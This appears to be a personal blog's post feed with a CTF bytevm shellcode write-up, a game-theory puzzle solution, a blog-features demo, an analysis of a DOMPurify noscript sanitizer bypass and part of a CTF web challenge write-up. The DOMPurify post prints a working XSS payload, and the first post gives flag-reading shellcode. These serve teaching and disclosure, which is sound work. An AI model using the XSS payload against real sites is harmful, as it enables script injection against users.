Contains some shellcode that reads the flag file and prints it (how convenient that the string "flag" is only 4 bytes!)
Overwrites the code at the current eip to jump to the start of this shellcode
then we can print out the flag and win!

I was initially left wondering about the best way to do the above, but a friend wisely suggested a loop of shifting left by 4 bytes, then adding the value that corresponds to the next 4 bytes you want, and so forth.
This works really well. However, we cannot shift by 4 bytes at a time, as that would require multiplying by 0x0100000000, which needs one more byte than the 4-byte operand we are allowed.
Therefore, to keep things simple, I opted to shift by 3 bytes at a time. The big-endianness makes this really straightforward.

To do this, we simply multiply by 0x01000000: $0x1234 \cdot 0x01000000 = 0x1234000000$
Then, we add the value of the 3 bytes we want. We can do this for our entire payload and then call the "done" instruction and win.

In the interest of saving operations, however, I opted to spam a few mul 0xffffffff operations first to fill up space with "random" bytes that we won't care about.
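The shift-and-add idea can be sketched in plain Python. This is a hypothetical helper, not the redacted solve script: it assumes ecx starts at 1 (as in the calculator program), skips the mul 0xffffffff filler trick, and only produces the (instruction, operand) pairs without talking to the server. Python's unbounded integers stand in for the missing bounds check. Note that leading zero bytes disappear once the payload is an integer, so how store sizes its write matters; the sketch does not model that.

```python
def build_ops(payload: bytes):
    """Hypothetical helper: (instruction, operand) pairs that make ecx equal the payload as a big-endian integer."""
    # left-pad with zero bytes so the payload splits evenly into 3-byte chunks
    data = b"\x00" * (-len(payload) % 3) + payload
    ops = [("sub", 1)]  # ecx starts at 1, so bring it down to 0 first
    for i in range(0, len(data), 3):
        ops.append(("mul", 0x01000000))                            # shift ecx left by 3 bytes
        ops.append(("add", int.from_bytes(data[i:i + 3], "big")))  # fill the 3 freed bytes
    return ops


def run_ops(ops, ecx=1):
    """Replay the operations on an unbounded Python int, mimicking the missing bounds check."""
    for op, operand in ops:
        if op == "add":
            ecx += operand
        elif op == "sub":
            ecx -= operand
        elif op == "mul":
            ecx *= operand
    return ecx


payload = bytes.fromhex("0000000c000007f8")  # e.g. the first 8 bytes of "jmp 0x7f8"
ops = build_ops(payload)
print(len(ops), hex(run_ops(ops)))
```

Every operand stays below 2**32, so each one fits in the 4 bytes the calculator reads per operand.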

We first create a shellcode snippet that can be used to read and print the flag:

# add "flag" to ecx
add ecx flag 0x0

# push to stack
push ecx 0x0 0x0

# flag is now at addr 0x74

add ecx 0x0 0x74
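# call the open syscall to read the file named at that address into ebx
syscall 0x2 ecx ebx

# store the value read into ebx at memory address 0x100
store ebx 0x100 0x0
# point ebx at address 0x100 for the print syscall
add ebx 0x100 0x0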
# call print syscall to print the value out
syscall 0x0 ebx 0x0
halt 0x0 0x0 0x0

Our payload (theoretically) will be constructed like so:

Contents	0x8c4 bytes (filler)	shellcode	jmp instruction to the top of the shellcode
Address range	0x74-0x938	0x938-0x9b8	0x9b8-0x9c8

We can then solve the challenge with this rather clunky solve script:

<redacted for now>

Revisiting the challenge from the perspective of a participant

Recon

Analysis and decompilation of the bytevm

Exploit creation

Solve script

Robot Baseball: Jane Street October 2025 monthly puzzle

kek — Tue, 04 Nov 2025 00:00:00 GMT

After a recent breakup, I needed something to distract myself and decided to work on Jane Street's puzzle of the month.

If you're just interested in the solution script, it is available here

Problem Analysis

The puzzle reads

The Artificial Automaton Athletics Association (Quad-A) is at it again, to compete with postseason baseball they are developing a Robot Baseball competition. Games are composed of a series of independent at-bats in which the batter is trying to maximize expected score and the pitcher is trying to minimize expected score.

An at-bat is a series of pitches with a running count of balls and strikes, both starting at zero. For each pitch, the pitcher decides whether to throw a ball or strike, and the batter decides whether to wait or swing; these decisions are made secretly and simultaneously. The results of these choices are as follows.

If the pitcher throws a ball and the batter waits, the count of balls is incremented by 1.
If the pitcher throws a strike and the batter waits, the count of strikes is incremented by 1.
If the pitcher throws a ball and the batter swings, the count of strikes is incremented by 1.
If the pitcher throws a strike and the batter swings, with probability p the batter hits a home run and with probability 1-p the count of strikes is incremented by 1.

An at-bat ends when either:

The count of balls reaches 4, in which case the batter receives 1 point.
The count of strikes reaches 3, in which case the batter receives 0 points.
The batter hits a home run, in which case the batter receives 4 points.

By varying the size of the strike zone, Quad-A can adjust the value p, the probability a pitched strike that is swung at results in a home run. They have found that viewers are most excited by at-bats that reach a full count, that is, the at-bats that reach the state of three balls and two strikes. Let q be the probability of at-bats reaching full count; q is dependent on p. Assume the batter and pitcher are both using optimal mixed strategies and Quad-A has chosen the p that maximizes q. Find this q, the maximal probability at-bats reach full count, to ten decimal places.

This is quite clearly some sort of game theory problem, in which one party seeks to minimize a particular value (num of points) and the other seeks to maximise the same value.

The problem is quite wordy and is probably best displayed as a table:

Batter \ Pitcher	Ball	Strike
Swing	+1 Strike	p: home run / 1-p: +1 Strike
Wait	+1 Ball	+1 Strike

Now, the first question we have to ask ourselves is: is there a dominant strategy? Say p = 0. Then the pitcher would always throw a strike, as this always leads to +1 Strike, and the batter would always wait, since swinging can never produce a home run. Therefore, every pitch would be +1 Strike, and the at-bat would end after 3 pitches with 0 points.

However, since the problem seems to imply that mixed strategies are played at the p that maximises the probability of a full count, let's assume that there is no dominant strategy.

Furthermore, the optimal strategy probably depends on the state of the game. Therefore, let us begin by modelling this state of the game.

Thought process

Call the state of the game S(b,s), where b is the number of current balls and s is the number of current strikes.
Then call the expected value of each state E(S,p,x,y), where S is the state of the game, p is the probability of a homerun when we have a Strike/Swing scenario, and x and y are the probabilities of the pitcher choosing a ball and the batter choosing to wait. Alternatively, you could notate E(b,s,p,x,y) for simplicity.

The goal of the pitcher is to minimise the value of the state and the goal of the batter is to maximise it.

Now, we use some logic to "simplify" the problem.
Given some state S, let's say that for the pitcher, $ E(Ball) = 0.7 $ and $ E(Strike) = 0.8 $, where E is the expected number of points resulting from a specific action.
In this scenario, one can clearly tell that the pitcher should always throw a Ball, as this minimizes the expected points.

It is often confusing to those new to game theory why players must be indifferent between actions in a mixed optimal strategy, but allow me to present an intuitive argument for this.
Keep in mind that a Nash equilibrium strategy assumes that both players have full knowledge of the other person's strategy.
Consider the following scenario:

If the batter chooses his probability of waiting in such a way that throwing a ball is always better for the pitcher, then the pitcher will always choose a ball.
The batter would then always wait, since against a pitcher who only throws balls, waiting guarantees a walk and 1 point.
However, if the batter always chooses to wait, the pitcher is no longer incentivised to throw a ball, and will therefore be more inclined to throw a strike.
Therefore, the pitcher will increase his probability of striking. In return, the batter will choose to swing more, and this "process" continues until they eventually reach a state where neither the batter nor the pitcher has a preference between their actions.

Therefore, at the equilibrium, the "payoff" or inversely, the "cost" of each action for a player must be the same.

This insight thus allows us to mathematically represent the optimal strategies

The value of the state E(x,y,b,s) can thus be calculated as follows
Remember that x = probability of ball, y = probability of wait, b = num of balls, s = num of strikes
$$ \begin{aligned} &E(x,y,b,s) = xy * E(x,y,b+1,s) \\
&+ (1-x)y * E(x,y,b,s+1) \\
&+ x(1-y) * E(x,y,b,s+1) \\
&+ (1-x)(1-y) * [p * 4 + (1-p) * E(x,y,b,s+1)] \end{aligned} $$

Pitcher's equilibrium

The expected value of the pitcher choosing to throw a ball is as follows (forgive the notation)
$$ E(ball) = y * E(x,y,b+1,s) + (1-y) * E(x,y,b,s+1) $$

The expected value of the pitcher choosing to throw a strike is as follows
$$ E(strike) = y * E(x,y,b,s+1) + (1-y) * (4p + (1-p) * E(x,y,b,s+1)) $$

Additionally, we know that these two values must be equal for indifference. Therefore, $$ \begin{aligned} &y * E(x,y,b+1,s) + (1-y) * E(x,y,b,s+1) = y * E(x,y,b,s+1) + (1-y) * (4p + (1-p) * E(x,y,b,s+1)) \\
&y = \frac{p(4 - E(x,y,b,s+1))}{E(x,y,b+1,s) - E(x,y,b,s+1) + p(4 - E(x,y,b,s+1))} \end{aligned} $$

Batter's equilibrium

Likewise, the expected value of the batter choosing to wait is as follows
$$ E(wait) = x * E(x,y,b+1,s) + (1-x) * E(x,y,b,s+1) $$

The expected value of the batter swinging is as follows
$$ E(swing) = x * E(x,y,b,s+1) + (1-x) * (4p + (1-p) * E(x,y,b,s+1)) $$

And therefore, $$ \begin{aligned} &x * E(x,y,b+1,s) + (1-x) * E(x,y,b,s+1) = x * E(x,y,b,s+1) + (1-x) * (4p + (1-p) * E(x,y,b,s+1)) \\
&x = \frac{p(4 - E(x,y,b,s+1))}{E(x,y,b+1,s) - E(x,y,b,s+1) + p(4 - E(x,y,b,s+1))} \end{aligned} $$
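As a quick sanity check on the algebra, here is a small Python sketch (the helper names are my own) that plugs random continuation values A = E(x,y,b+1,s) and B = E(x,y,b,s+1) into the formula above and measures how far each player is from indifference. It treats the next-state values as already known and assumes A ≥ B, i.e. an extra ball is worth at least as much to the batter as an extra strike.

```python
import random

def mix_prob(next_ball: float, next_strike: float, p: float) -> float:
    """x = y = p(4 - B) / (A - B + p(4 - B)), with A = E(b+1,s) and B = E(b,s+1)."""
    return p * (4 - next_strike) / (next_ball - next_strike + p * (4 - next_strike))

def indifference_gaps(next_ball: float, next_strike: float, p: float) -> tuple:
    """Return (E(ball) - E(strike), E(wait) - E(swing)) at the mixed strategy."""
    t = mix_prob(next_ball, next_strike, p)
    swing_at_strike = 4 * p + (1 - p) * next_strike  # hit for 4 w.p. p, else a strike
    # Pitcher's view: the batter waits with probability y = t
    e_ball = t * next_ball + (1 - t) * next_strike
    e_strike = t * next_strike + (1 - t) * swing_at_strike
    # Batter's view: the pitcher throws a ball with probability x = t
    e_wait = t * next_ball + (1 - t) * next_strike
    e_swing = t * next_strike + (1 - t) * swing_at_strike
    return e_ball - e_strike, e_wait - e_swing

random.seed(0)
worst = 0.0
for _ in range(10_000):
    next_strike = random.uniform(0.0, 1.0)
    next_ball = random.uniform(next_strike, 1.0)  # assume A >= B
    p = random.uniform(0.01, 1.0)
    worst = max(worst, *map(abs, indifference_gaps(next_ball, next_strike, p)))
print(f"largest indifference gap: {worst:.2e}")
```

Once x = y, E(ball) and E(wait) are literally the same expression (as are E(strike) and E(swing)), which is why the two equilibrium equations coincide.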

Solution walkthrough

What a coincidence! It seems that the equations for both the batter's and the pitcher's optimal strategies are the same!
Furthermore, we know the values of the terminal states!
E.g. $E(x,y,4,k) = 1$ and $E(x,y,m,3) = 0$ for any $k < 3$ and $m < 4$
We can now implement this in code with some recursion.

First, write the function V(b,s,p) that calculates the value of a state given b,s,p

# returns the value function for state S(b,s)
V_cache = {} # memoise V: x() and y() both call V() on the next states, so without a cache the recursion recomputes the same states over and over (and vanilla python w/o numpy is slow)
def V(b,s,p):
    if b == 4: # terminal state for 4 balls
        return 1 
    if s == 3: # terminal state for 3 strikes
        return 0
    key = (b, s) # cache lookup for speed
    if key in V_cache:
        return V_cache[key]
    else:
        x_val = x(b, s, p) # we will write these functions later on
        y_val = y(b, s, p)
        result = (
            x_val * y_val * V(b+1,s,p) + 
            x_val * (1 - y_val) * V(b,s+1,p) + 
            (1 - x_val) * y_val * V(b,s+1,p) + 
            4 * p * (1 - x_val) * (1 - y_val) + 
            (1 - x_val) * (1 - y_val) * (1 - p) * V(b,s+1,p)
        )
        V_cache[key] = result
        return result

Next, write functions x and y, which calculate the optimal strategies given the value functions of the next states

# returns the optimal frequency for throwing a ball
def x(b,s,p):
    return (p * (4 - V(b,s+1,p))) / (V(b+1,s,p) - V(b,s+1,p) + p * (4 - V(b,s+1,p)))

# returns the optimal frequency for waiting
def y(b,s,p):
    return (p * (4 - V(b,s+1,p))) / (V(b+1,s,p) - V(b,s+1,p) + p * (4 - V(b,s+1,p)))

Lastly, since we want the value of p that maximises Q, the probability that an at-bat reaches a full count (3 balls, 2 strikes), we write a function Q that returns the probability of reaching state S(b,s).

The formula for Q is as follows $$ \begin{aligned} &Q(b,s,p) = x(b-1,s,p) * y(b-1,s,p) * Q(b-1,s,p) \\
&+ x(b,s-1,p) * (1 - y(b,s-1,p)) * Q(b,s-1,p) \\
&+ (1 - x(b,s-1,p)) * y(b,s-1,p) * Q(b,s-1,p) \\
&+ (1 - x(b,s-1,p)) * (1 - y(b,s-1,p)) * (1 - p) * Q(b,s-1,p) \end{aligned} $$

Q_cache = {} # again, cache here used for speed
# returns the probability of reaching state S(b,s)
def Q(b,s,p):
    if b == 0 and s == 0: # we always start at S(0,0), so we have a probability of 1 of reaching this state
        return 1
    
    if b < 0 or s < 0: # we can never reach values with b < 0 or s < 0
        return 0
    
    key = (b,s)
    if key in Q_cache:
        return Q_cache[key]
    
    else:
        res = ( 
            x(b-1,s,p) * y(b-1,s,p) * Q(b-1,s,p) +
            x(b,s-1,p) * (1 - y(b,s-1,p)) * Q(b,s-1,p) +
            (1 - x(b,s-1,p)) * y(b,s-1,p) * Q(b,s-1,p) +
            (1 - x(b,s-1,p)) * (1 - y(b,s-1,p)) * (1 - p) * Q(b,s-1,p)
        )

        Q_cache[key] = res
        return res

Now, all we need to do is find the p that maximises Q.
Let's plot Q as p varies.

import matplotlib.pyplot as plt
x_vals = []
y_vals = []
for i in range(1,101):
    V_cache = {}
    Q_cache = {}
    x_vals.append(i/100)
    y_vals.append(Q(3,2,i/100))

plt.xlabel("p value")
plt.ylabel("Q(3,2,p)")
plt.plot(x_vals, y_vals)
plt.show()

As you can see, the value of Q peaks somewhere around $p=0.22$.
We could then brute-force all values to 10 d.p. between 0.20 and 0.25 (one of my friends did exactly this with a C++ script).
However, given that our code is not terribly fast, it would probably be faster and more bearable to use an optimised search routine to narrow the peak down.

Thankfully, SciPy has a pretty good minimize_scalar function. Since we want to maximise Q instead of minimizing it, we can simply minimize -Q (or 1-Q).

from scipy.optimize import minimize_scalar
def compute_q(p):
    V_cache.clear()
    Q_cache.clear()
    return -Q(3,2,p)
res = minimize_scalar(
    compute_q,
    bounds=(0,1),
    method='bounded',
    options= {
        'disp': True
    }
)

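# res.fun is -Q at res.x; calling Q(3,2,res.x) here would reuse caches left over from the last p the optimiser evaluated
print("Optimal p:", f"{res.x:.10f}", "Resultant Q = ", f"{-res.fun:.10f}") # 0.2269743428955392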

Optimal p: 0.2269743429 Resultant Q = 0.2959679933
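If you'd rather avoid SciPy and the manual cache clearing, here is a self-contained sketch of the same model (the function names are my own). It memoises with functools.lru_cache keyed on p, so values from a previous p can never leak in, and swaps minimize_scalar for a plain golden-section search, which assumes Q(3,2,p) is unimodal on [0, 1] as the plot suggests. One caveat for any floating-point optimiser here: Q is flat at its peak, so the location of the maximum can only be pinned down to roughly 1e-8, and minimize_scalar's bounded method also stops at its default xatol of 1e-5 unless told otherwise.

```python
import math
from functools import lru_cache

@lru_cache(maxsize=None)
def value(b: int, s: int, p: float) -> float:
    """Equilibrium expected points V(b, s) for hit probability p."""
    if b == 4:  # walk
        return 1.0
    if s == 3:  # strikeout
        return 0.0
    t = mix(b, s, p)
    nb, ns = value(b + 1, s, p), value(b, s + 1, p)
    swing_at_strike = 4 * p + (1 - p) * ns
    return t * t * nb + 2 * t * (1 - t) * ns + (1 - t) ** 2 * swing_at_strike

def mix(b: int, s: int, p: float) -> float:
    """Shared optimal probability x = y at count (b, s)."""
    nb, ns = value(b + 1, s, p), value(b, s + 1, p)
    return p * (4 - ns) / (nb - ns + p * (4 - ns))

@lru_cache(maxsize=None)
def reach(b: int, s: int, p: float) -> float:
    """Probability that the at-bat passes through count (b, s)."""
    if b == 0 and s == 0:
        return 1.0
    total = 0.0
    if b > 0:  # ball + wait from (b-1, s)
        t = mix(b - 1, s, p)
        total += t * t * reach(b - 1, s, p)
    if s > 0:  # any strike that doesn't end the at-bat, from (b, s-1)
        t = mix(b, s - 1, p)
        total += (2 * t * (1 - t) + (1 - t) ** 2 * (1 - p)) * reach(b, s - 1, p)
    return total

def golden_max(f, lo: float, hi: float, tol: float = 1e-8) -> float:
    """Golden-section search for the maximum of a unimodal f on [lo, hi]."""
    inv_phi = (math.sqrt(5) - 1) / 2
    c, d = hi - inv_phi * (hi - lo), lo + inv_phi * (hi - lo)
    fc, fd = f(c), f(d)
    while hi - lo > tol:
        if fc > fd:  # maximum lies in [lo, d]
            hi, d, fd = d, c, fc
            c = hi - inv_phi * (hi - lo)
            fc = f(c)
        else:  # maximum lies in [c, hi]
            lo, c, fc = c, d, fd
            d = lo + inv_phi * (hi - lo)
            fd = f(d)
    return (lo + hi) / 2

p_star = golden_max(lambda p: reach(3, 2, p), 0.0, 1.0)
print(f"Optimal p ~ {p_star:.8f}, Q ~ {reach(3, 2, p_star):.8f}")
```

Golden-section search only needs one new evaluation per iteration and no derivatives, which suits a function that is expensive-ish to evaluate in pure Python.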

And that's the puzzle solved! :laughing:

Showing Off Blog Features

kek — Sun, 20 Jul 2025 00:00:00 GMT

Since the post does not have a description in the frontmatter, the first paragraph is used.

Theming

Use your favorite editor theme for your blog!

Theming for the website comes from built-in Shiki themes found in Expressive Code. You can view them here. A website can have one or more themes, defined in src/site.config.ts. There are three theming modes to choose from:

single: Choose a single theme for the website. Simple.
light-dark-auto: Choose two themes for the website to use for light and dark mode. The header will include a button for toggling between light/dark/auto. For example, you could choose github-dark and github-light with a default of "auto" and the user's experience will match their operating system theme straight away.
select: Choose two or more themes for the website and include a button in the header to change between any of these themes. You could include as many Shiki themes from Expressive Code as you like. Allow users to find their favorite theme!

When the user changes the theme, their preference is stored in localStorage to persist across page navigation.

Code Blocks

Let's look at some code block styles:

def hello_world():
    print("Hello, world!")

hello_world()

def hello_world():
    print("Hello, world!")

hello_world()

python hello.py

Also some inline code: 1 + 2 = 3. Or maybe even (= (+ 1 2) 3).

See the Expressive Code Docs for more information on available features like wrapping text, line highlighting, diffs, etc.

Basic Markdown Elements

List item 1
List item 2

Bold text

Italic text

~~Strikethrough text~~

Link

In life, as in art, some endings are bittersweet. Especially when it comes to love. Sometimes fate throws two lovers together only to rip them apart. Sometimes the hero finally makes the right choice but the timing is all wrong. And, as they say, timing is everything.

- Gossip Girl

Name	Age	City
Alice	30	New York
Bob	25	Los Angeles
Charlie	35	Chicago

Images

Images can include a title string after the URL to render as a <figure> with a <figcaption>.

![Pixel art of a tree](https://upload.wikimedia.org/wikipedia/commons/9/90/PixelatedGreenTreeSide.png "Pixel art renders poorly without proper CSS")

I've also added a special tag for pixel art that adds the correct CSS to render properly. Just add #pixelated to the URL.

![Pixel art of a tree](https://upload.wikimedia.org/wikipedia/commons/9/90/PixelatedGreenTreeSide.png#pixelated "But adding #pixelated fixes this")

Admonitions

:::note
testing123
:::

:::note
testing123
:::

:::tip
testing123
:::

:::important
testing123
:::

:::caution
testing123
:::

:::warning
testing123
:::

HTML Elements

<button>A Button</button>

Fieldset with Inputs

<fieldset> <input type="text" placeholder="Type something"><br> <input type="number" placeholder="Insert number"><br> <input type="text" value="Input value"><br> <select> <option value="1">Option 1</option> <option value="2">Option 2</option> <option value="3">Option 3</option> </select><br> <textarea placeholder="Insert a comment..."></textarea><br> <label><input type="checkbox"> I understand<br></label> <button type="submit">Submit</button> </fieldset>

Form with Labels

<form> <label> <input type="radio" name="fruit" value="apple"> Apple </label><br>

<label> <input type="radio" name="fruit" value="banana"> Banana </label><br>

<label> <input type="radio" name="fruit" value="orange"> Orange </label><br>

<label> <input type="radio" name="fruit" value="grape"> Grape </label><br>

<label> <input type="checkbox" name="terms" value="agree"> I agree to the terms and conditions </label><br>

How I accidentally set a DOMPurify 0 day as a national high school olympiad qualification challenge

kek — Fri, 10 Apr 2026 00:00:00 GMT

The Singapore National Cybersecurity Olympiad preliminary round has just concluded.

For the contest, I set 2 web challenges. Here's how I accidentally set a 0 day DOMPurify vulnerability as a challenge.

The Challenge

Not sure if I can share the entire source, but the challenge revolves around this code snippet:

const clean = DOMPurify.sanitize(content);

res.send("<div><noscript>"+clean+"</noscript></div>")

Disclaimer: I found this behaviour somewhere around November 2025 and assumed it was intended behaviour, i.e. that its exploitability stemmed from misusing DOMPurify (sanitizing without context) rather than from an actual vulnerability. Therefore, I did not report it at that point in time (trust me, I would've collected that CVE if I thought it could've been one). I only realised it was a genuine vulnerability after the contest, when I was notified of the CVE that had been released 2 days before the contest.

Oops...

Anyways, fast forward to the day of the contest when I received this message from the other web author - @halogen

At this time, I was busy playing poker at a friend's place. Nonetheless, I quickly whipped out my laptop to check if I had indeed committed a whoopsie :p

After updating DOMPurify and spinning up the challenge...yep, it seemed like the latest DOMPurify patch fixed my challenge. Thankfully, the Docker image we were deploying at that time still had the outdated DOMPurify version!

Therefore, I didn't think much of it until later.

Preliminary investigations

The CVE in question is CVE-2026-0540, a vulnerability in the sanitizer caused by the SAFE_FOR_XML regex not covering all rawtext elements.

Before we go further, let me show you my intended solution to the challenge:

<div id="</noscript><img src=x onerror=eval(atob(''))>"></div>

Now let's see why this works.

noscript...or yesscript?

noscript is an HTML tag that defines alternate content to be displayed when the user's browser has JavaScript disabled. When scripting is enabled (as it is in any normal browser), the parser handles this by treating everything after a <noscript> tag as literal raw text until it hits a </noscript> closing tag. (In my personal opinion, the name "noscript" is extremely misleading to beginner developers who might use it as an XSS prevention, but webdev might be dead to Claude anyways so...)

Actual analysis

Here's how the bug actually worked.

DOMPurify mistakenly assumes that attribute boundaries are preserved across different HTML contexts.
What does one mean by this? Well, essentially DOMPurify assumes that things within an attribute stay within an attribute, which is really really really not the case for raw text elements like noscript, xmp, iframe, noembed and noframes.

As explained above, the HTML tokenizer treats content differently depending on which context it is in. Consider this snippet:

<div kek="</noscript>">hehe</div>

This is perfectly fine behaviour. The attribute "kek" has the value "</noscript>". There is no opening noscript tag, so the HTML parser never enters a noscript context.

Now consider this snippet

<noscript><div kek="</noscript>normal_html">hehe</div>

Now this is a very different scenario. The HTML tokenizer sees the opening <noscript> tag and proceeds to treat everything after it as raw text. Therefore, <div kek=" becomes raw text. Then, it sees a </noscript> closing tag and exits the noscript context, so everything after it (normal_html) is parsed as, well, normal HTML.
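To make the context switch concrete, here is a toy Python model of just this one tokenizer rule (my own simplification, not a real HTML parser): after a plain <noscript> start tag, with scripting enabled, raw text runs until the first "</noscript" followed by whitespace, "/" or ">", and anything after that end tag is parsed as markup again.

```python
import re
from typing import Optional

# Raw text ends at the first "</noscript" followed by whitespace, "/" or ">"
END_TAG = re.compile(r"</noscript[\t\n\f\r />]", re.IGNORECASE)

def parsed_as_markup_after_noscript(doc: str) -> Optional[str]:
    """Toy model: return the part of `doc` parsed as normal HTML once the first
    <noscript> raw text ends, or None if there is no <noscript> start tag."""
    start = doc.lower().find("<noscript>")
    if start == -1:
        return None  # the parser never enters a raw text context
    end = END_TAG.search(doc, start + len("<noscript>"))
    if end is None:
        return ""  # raw text runs to the end of the input
    return doc[doc.index(">", end.start()) + 1:]  # resume after the end tag's ">"

print(parsed_as_markup_after_noscript('<div kek="</noscript>">hehe</div>'))
# None
print(parsed_as_markup_after_noscript('<noscript><div kek="</noscript>normal_html">hehe</div>'))
# normal_html">hehe</div>
```

Feeding it the challenge's response (the sanitized payload wrapped in <div><noscript>...</noscript></div>) leaves a string that starts with the <img onerror=...> tag, which is the escape described below.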

Here is the code snippet responsible:

/* Work around a security issue with comments inside attributes */
if (
  SAFE_FOR_XML &&
  regExpTest(/((--!?|])>)|<\/(style|title|textarea)/i, value)
) {
  _removeAttribute(name, currentNode);
  continue;
}

Interestingly enough, you can see the remnants of a patch for what I presume was another XSS vulnerability involving HTML comments! This is a good example of why looking at past commits can be so insanely valuable in finding new bugs.

Anyhoo, the attribute guard fails to check for closing noscript tags (or xmp, iframe, noembed and noframes). The patch is as follows:

if (SAFE_FOR_XML && regExpTest(/((--!?|])>)|<\/(style|title|xmp|textarea|noscript|iframe|noembed|noframes)/i, value)) {

As you can see, the proper checks are now in place.
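A quick way to see the difference is to port both guards to Python's re and run them against the attribute value from my payload. This only reproduces the regex test quoted above, not the rest of DOMPurify, and the attribute_removed helper is a name I made up.

```python
import re

# Guard before the fix (pattern as quoted above)
OLD_GUARD = re.compile(r"((--!?|])>)|<\/(style|title|textarea)", re.IGNORECASE)
# Guard after the fix, now covering the remaining raw text elements
NEW_GUARD = re.compile(
    r"((--!?|])>)|<\/(style|title|xmp|textarea|noscript|iframe|noembed|noframes)",
    re.IGNORECASE,
)

def attribute_removed(guard: re.Pattern, value: str) -> bool:
    """True if the guard would strip an attribute with this value (regExpTest ~ search)."""
    return guard.search(value) is not None

payload_value = "</noscript><img src=x onerror=eval(atob(''))>"
print(attribute_removed(OLD_GUARD, payload_value))  # False: the id attribute survives
print(attribute_removed(NEW_GUARD, payload_value))  # True: the id attribute is removed
```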

Visualization of what happens

So what actually happens in this challenge?

Well, the challenge concatenates a sanitized snippet into a noscript context:

res.send("<div><noscript>"+clean+"</noscript></div>")

Consider the intended payload <div id="</noscript><img src=x onerror=eval(atob(''))>"></div>.

When this gets injected into the response, it becomes:

<div><noscript><div id="</noscript><img src=x onerror=eval(atob(''))>"></div></noscript></div>

See what happens? We escape out of the initial noscript. The DOM looks like this:

<div>
  <noscript><div id="</noscript>
  <img src=x onerror=eval(atob(''))>">
</div>
</noscript>
</div>

Our img tag is rendered fully and therefore we achieve XSS! Delicious...

In defense of myself + extra vibecoding thoughts

Now you may ask: if you found this all the way back in November, why did you not report it? My defense is that I did not actually realise this was a vulnerability at all. I assumed that this was intended behaviour of DOMPurify and that this would be classified as "unintended usage due to lack of context given to DOMPurify (a known issue)" had I reported it.

I do not believe that using DOMPurify this way is smart.

Also it was probably 2am when I found this bug :p

RIP my CVE I guess...

Anyways, an interesting note is that this challenge was themed around how vibecoding could introduce vulnerabilities into your code. The context was a webapp that was 100% vibecoded. Initially, I had prompted Claude to "create a webapp for my ctf chall etc...don't introduce the vulnerability yet, I'll do this myself". Surprisingly, it actually wrote the challenge (including the vulnerable code!) with a comment that said '# Safe sanitization code for now, the user will introduce the vulnerability later'

Perhaps this should've told me that this was an actual vulnerability but I guess I was just too oblivious.

Conclusion

Anyhow, I hope you enjoyed this small analysis of the CVE. Hopefully I actually report bugs I find next time (or maybe not).

osu!gaming CTF 2025 - Chart Viewer (Web)

kek — Thu, 06 Nov 2025 00:00:00 GMT

Introduction

I recently played the osu!gaming CTF with slight_smile and we managed to clinch 3rd!
We solved a challenge that was really similar to another race condition challenge I wrote for Sieberrsec CTF (S.K.I.B.I.D.I), just with a more obvious entry point for the race condition.

I love looking at those chart background...
expected difficulty: 3/5
Author: chara
Solves: 14
Attachments: web_chart-viewer.tar.gz

Recon

Initial recon of this challenge is pretty simple since the source is provided as unobfuscated JavaScript.

We see index.js, flag.txt, and readflag.c. Additionally, the challenge is instanced.
Immediately, this tells me that we probably need RCE, or at least some way to execute the readflag binary and get its output out somehow.

Let's take a look at the Dockerfile:

FROM gcc:latest AS build-readflag
COPY readflag.c /readflag.c
RUN gcc /readflag.c -o /readflag && \
    chown root:root /readflag && chmod 4755 /readflag

FROM node:latest

COPY --from=build-readflag /readflag /readflag
RUN chown root:root /readflag && chmod 4755 /readflag

COPY --chown=root:root flag.txt /flag.txt
RUN chmod 400 /flag.txt

# install 7z and unzip
RUN apt-get update && apt-get install -y p7zip-full unzip

RUN useradd -m app
USER app

WORKDIR /app
COPY package.json ./
RUN npm install
COPY public ./public
COPY index.js ./

ENTRYPOINT [ "node", "index.js" ]

Our suspicions are confirmed! On build, readflag.c is compiled and the resulting binary is chown'ed to root, given the SUID bit (chmod 4755) and placed in the root directory /. Thereafter, the flag is placed at /flag.txt, owned by root and readable only by root (chmod 400).
unzip and p7zip-full are installed for some reason, and then the webserver is set up and run as the "app" user.
Therefore, even if we achieve an arbitrary file read/write, we cannot read flag.txt directly and have to find some way to call the /readflag binary.

Next, let's take a look at readflag.c:

/* readflag.c — minimal SUID reader (safer than system()) */
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <errno.h>
#include <stdio.h>

int main(void) {
    if (setuid(0) != 0) {
        _exit(1);
    }

    /* setgroups(0, NULL); */ /* uncomment if desired and permitted */

    int fd = open("/flag.txt", O_RDONLY | O_CLOEXEC);
    if (fd < 0) _exit(2);

    /* Read and write loop */
    char buf[4096];
    ssize_t n;
    while ((n = read(fd, buf, sizeof(buf))) > 0) {
        ssize_t w = 0;
        while (w < n) {
            ssize_t s = write(1, buf + w, n - w);
            if (s <= 0) _exit(3);
            w += s;
        }
    }
    close(fd);
    _exit(0);
}

This is pretty simple: because the binary is SUID root, its setuid(0) call succeeds, and it then reads /flag.txt and writes the contents to stdout. Nothing too fancy here.

Now, onto the meat and potatoes of this challenge - index.js

There are quite a few functions that look potentially interesting, let's take a look at them

const MAX_UPLOAD_BYTES = 2 * 1024 * 1024; // 2 MB

const UPLOAD_DIR = '/tmp/uploads';
if (!fs.existsSync(UPLOAD_DIR)) fs.mkdirSync(UPLOAD_DIR, { recursive: true });

const storage = multer.diskStorage({
  destination: (req, file, cb) => cb(null, UPLOAD_DIR),
  filename: (req, file, cb) => cb(null, req.body.name || file.originalname)
});

const fileFilter = (req, file, cb) => {
  const name = req.body.name || file.originalname;
  if (name.includes('..') || name.includes('/') || name.includes('\\')) {
    return cb(null, false);
  }
  cb(null, true);
};
const upload = multer({ storage, fileFilter });

Here, the webserver defines MAX_UPLOAD_BYTES, which is likely the maximum size of any file we can upload later. 2MB is generous, so the limit shouldn't get in our way; it also suggests that we aren't meant to upload huge files in an attempt to lag the filesystem.
Next, UPLOAD_DIR is set to /tmp/uploads - likely where our uploaded files are stored.

We can see that multer is configured with diskStorage to UPLOAD_DIR, confirming our suspicions.

Lastly, fileFilter rejects any filename containing '..', '/' or '\', which rules out naive path traversal.

app.post('/upload', upload.single('file'), (req, res) => {
  if (!req.file) return res.status(400).send('no file uploaded, check filename');
  if (req.file.filename.includes('..') || req.file.filename.includes('/')) {
    return res.status(400).send('invalid filename');
  }
  res.send(`${req.file.filename}`);
});

The upload endpoint is pretty basic. We just need to provide a filename, and it checks whether the filename includes '..' or '/'. Interestingly enough, the if statement that returns "invalid filename" doesn't check for '\'. I thought that was interesting at first, but it leads nowhere in the end (fileFilter already rejects backslashes).
With this, we can upload a file under (almost) any name into /tmp/uploads.
